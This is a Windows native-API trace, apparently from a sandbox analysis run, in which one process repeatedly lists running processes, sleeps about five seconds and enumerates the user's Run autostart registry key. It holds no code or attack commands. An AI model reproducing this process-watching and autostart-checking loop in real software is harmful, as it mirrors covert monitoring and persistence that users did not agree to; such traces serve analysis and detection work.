[0304.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.423] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.427] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.428] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.430] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.432] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.432] NtClose (Handle=0x378) returned 0x0 [0304.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.435] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.440] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.443] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.561] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.562] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.562] NtClose (Handle=0x378) returned 0x0 [0304.562] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.576] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.578] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.578] NtClose (Handle=0x378) returned 0x0 [0304.578] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.579] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.591] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.595] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.595] NtClose (Handle=0x378) returned 0x0 [0304.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.596] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.723] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.766] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.767] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.767] NtClose (Handle=0x378) returned 0x0 [0304.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.787] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.788] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.788] NtClose (Handle=0x378) returned 0x0 [0304.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.807] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.808] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.808] NtClose (Handle=0x378) returned 0x0 [0304.808] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.823] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.824] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.824] NtClose (Handle=0x378) returned 0x0 [0304.824] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.834] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.836] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.836] NtClose (Handle=0x378) returned 0x0 [0304.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.878] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.879] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.879] NtClose (Handle=0x378) returned 0x0 [0304.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.896] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.897] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.898] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.898] NtClose (Handle=0x378) returned 0x0 [0304.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.916] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.918] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.918] NtClose (Handle=0x378) returned 0x0 [0304.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.921] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0304.929] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x378) returned 0x0 [0304.930] NtEnumerateValueKey (in: KeyHandle=0x378, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0304.930] NtClose (Handle=0x378) returned 0x0 [0304.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x4e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0304.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0304.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0304.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x4e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0304.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0304.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0304.941] 